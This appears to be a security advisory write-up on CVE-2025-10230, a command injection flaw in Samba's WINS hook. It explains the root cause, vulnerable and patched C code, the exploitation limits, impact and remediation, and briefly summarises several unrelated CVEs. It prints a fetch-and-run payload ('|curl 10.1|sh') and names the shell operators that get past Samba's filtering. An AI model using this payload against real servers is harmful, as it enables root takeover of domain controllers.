Jun 3, 2026·6 min read·31 visits
Unauthenticated remote command execution via crafted NetBIOS Name Service packets exploiting unsanitized input in Samba's WINS hook shell invocation.
A critical OS command injection vulnerability exists in Samba's Windows Internet Name Service (WINS) server implementation when configured to run as an Active Directory Domain Controller (AD DC). Unsanitized NetBIOS name data extracted from WINS registration packets is directly concatenated into a shell command invocation and executed via Samba's wins hook parameter.
Samba is an open-source implementation of the Server Message Block (SMB) networking protocol, which provides file and print services for Microsoft Windows clients. When configured as an Active Directory Domain Controller (AD DC) with Windows Internet Name Service (WINS) support enabled, Samba resolves NetBIOS names for legacy Windows clients. This system relies on NetBIOS Name Service (NBNS) packets to process registrations, queries, and releases.
CVE-2025-10230 represents an OS command injection vulnerability within the WINS server implementation of Samba. The flaw resides in the handling of the optional wins hook parameter configured in the global section of the Samba configuration file (smb.conf). This parameter specifies an external command or script that Samba executes when WINS events occur, passing the registered NetBIOS name as an argument.
An unauthenticated, remote network attacker can exploit this flaw by sending a specially crafted NBNS Name Registration Request packet to a vulnerable Samba instance on UDP port 137. By inserting shell metacharacters into the NetBIOS name field, the attacker can force the host system to execute arbitrary commands. These commands execute with the elevated privileges of the Samba daemon, which typically runs as root or system.
The root cause of CVE-2025-10230 is the improper neutralization of special elements in the NetBIOS name string prior to passing it to a system shell interpreter. When WINS support is enabled (wins support = yes), the NetBIOS Name Service (nmbd or samba process) handles registrations. If a wins hook script is configured, Samba executes it dynamically to log or process registration changes.
To invoke the script, Samba constructs a shell command line string and executes it using an internal command runner helper, typically smbrun. This helper invokes the shell (such as /bin/sh -c) to run the configured command. Samba attempts to pass the extracted NetBIOS name directly as a command-line argument to the script, but it performs this action via simple string concatenation instead of safe argument passing.
Because the NetBIOS name string is parsed directly from the incoming UDP packet, it constitutes untrusted user input. Samba fails to validate, sanitize, or escape shell metacharacters present in the name before concatenation. When the shell parses the final concatenated command line, it interprets any injected shell operators as instruction separators or subshell execution commands, leading to arbitrary command execution.
The vulnerable code path involves the extraction of the NetBIOS name from the NBNS packet structure and its direct format mapping into the hook command string. In affected versions of Samba, the name formatting operates without proper shell escaping. The snippet below highlights the structural difference between direct concatenation and sanitized execution.
/* Vulnerable execution flow */
char *cmd = NULL;
// NetBIOS name is formatted directly into command string without sanitation
asprintf(&cmd, "%s %s %s %s %d", wins_hook, operation, nb_name, ip_addr, ttl);
// smbrun executes the command string via shell execution (/bin/sh -c)
smbrun(cmd, NULL);The security patches introduced in updated Samba versions correct this issue by applying dedicated sanitization to the NetBIOS name parameter. By escaping shell metacharacters prior to command formatting, the system prevents the shell interpreter from executing injected commands. Alternatively, modern safe parameters rely on executive helper APIs that do not invoke a command-line shell.
/* Patched execution flow showing sanitization */
char *escaped_name = shell_escape_string(nb_name);
if (escaped_name == NULL) {
return;
}
// The escaped name is safely formatted into the command string
asprintf(&cmd, "%s %s %s %s %d", wins_hook, operation, escaped_name, ip_addr, ttl);
smbrun(cmd, NULL);
SAFE_FREE(escaped_name);Exploitation of CVE-2025-10230 is constrained by the design limits of the NetBIOS protocol and Samba's input parsing. A standard NetBIOS name is strictly limited to 15 characters of user-defined data. This small payload window requires attackers to use concise payloads to achieve remote command execution or to leverage multi-stage execution techniques.
Furthermore, the NetBIOS name parser within Samba blocks or rejects packets containing specific metacharacters such as <, >, and ;. Attackers must avoid these restricted characters and instead use other shell operators to chain and execute commands. Operators like pipes (|), ampersands (&), backticks (`), and subshell operators ($()) remain viable within the parsing logic.
To execute the payload, an attacker constructs a NetBIOS Name Registration Request (Opcode 0xF) packet containing the payload in the NetBIOS name field. For example, the payload |curl 10.1|sh fits within the 15-character limit. When sent to the target server on UDP port 137, Samba parses the packet, matches the multi-home registration request, and invokes the wins hook script with the payload, prompting the server to fetch and execute an external script.
The impact of successful exploitation is critical, as represented by the CVSS score of 10.0. An unauthenticated remote attacker can execute arbitrary commands on the host operating system. Because the Samba daemon must run with high privileges to manage network sockets and domain controller assets, the injected commands execute as the root or SYSTEM user.
Compromising a Samba Active Directory Domain Controller yields total control over the domain's Identity and Access Management (IAM) infrastructure. An attacker who gains root access on a Domain Controller can extract password hashes, modify domain policies, establish persistent backdoors, and pivot to any other joined system within the directory service network.
The CVSS vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H confirms that the attack requires low complexity, no local privileges, and no user interaction. The Scope: Changed component highlights that the breach of the Samba process directly leads to the complete compromise of the underlying operating system and the associated Active Directory domain environment.
The primary and recommended remediation is to apply the official security updates released by Samba. Administrators must upgrade their installations to version 4.23.2, 4.22.5, or 4.21.9 or later. These versions incorporate security controls that escape the NetBIOS name parameter before executing external hooks.
If immediate patching is not feasible, administrators can implement effective workarounds by modifying the Samba configuration file (smb.conf). The first option is to disable legacy WINS name resolution support entirely by setting wins support = no in the global configuration section and restarting the service.
The second option is to disable the wins hook functionality if WINS resolution is still required. Commenting out or deleting the wins hook parameter from the global settings prevents Samba from invoking external shell scripts during WINS events, neutralizing the injection vector without disabling WINS itself.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
Samba Samba | < 4.21.9 | 4.21.9 |
Samba Samba | >= 4.22.0, < 4.22.5 | 4.22.5 |
Samba Samba | >= 4.23.0, < 4.23.2 | 4.23.2 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-78 |
| Attack Vector | Network (UDP 137) |
| CVSS Score | 10.0 |
| EPSS Score | 0.00378 |
| Impact | Unauthenticated Remote Code Execution |
| Exploit Status | Functional PoC available |
| KEV Status | Not currently listed |
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
A stored Cross-Site Scripting (XSS) vulnerability exists within plone.restapi, the REST API package for Plone content management system. By supplying a spoofed input MIME type (text/x-html-safe), an attacker can mislead the rendering layer (plone.app.textfield) into assuming that the supplied content is already sanitized. This causes the system to skip the safe_html transform, allowing arbitrary JavaScript to execute in the victim's browser when they view the compromised page.
An untrusted search path vulnerability in the GlobalDatabasePlugin component of the AWS Advanced JDBC Wrapper for Amazon Aurora PostgreSQL allows authenticated, low-privilege database users to hijack administrative session queries. By defining a custom function in a writable schema such as the public schema, an attacker can hijack queries executed automatically during driver-level topology detection. When a highly privileged database user connects to the database utilizing an affected version of the wrapper, the custom function executes under their security context, enabling remote privilege escalation to rds_superuser.
CVE-2026-27771 represents a critical security flaw in Gitea and Forgejo (up to and including version 1.26.1) involving missing authorization checks (CWE-862). Unauthenticated remote attackers can query, enumerate, and download private container images from the OCI-compliant container registry. Additionally, unauthorized users can retrieve private or internal source repository URLs via the Composer package registry metadata API. A public proof-of-concept exists, and threat metrics indicate highly active scanning and exploitation risks.
A missing authorization vulnerability in the Formie plugin for Craft CMS prior to version 3.1.28 allows low-privileged Control Panel users to read and modify sensitive administrative settings, configuration options, and third-party integrations.
CVE-2026-53598 is a directory traversal and arbitrary file read vulnerability in Microsoft Prompty ecosystem loaders across multiple languages. Prior to version 2.0.0-beta.2, the loaders resolved `${file:...}` reference strings inside frontmatter configuration blocks without enforcing that the target file paths resided within authorized directories. This deficiency allows an attacker-controlled configuration file to read sensitive operating system and application files through absolute paths, directory traversal, or symbolic link escapes. The issue is addressed across the Python, C#, Node.js/TypeScript, and Rust ecosystems.
A directory traversal vulnerability exists in the copy subcommand of the proot-distro utility. Due to incomplete path sanitization, local attackers or malicious scripts can read from or write to arbitrary files outside the container rootfs, bypassing isolation barriers and potentially gaining unauthorized access or persistent execution on the host system.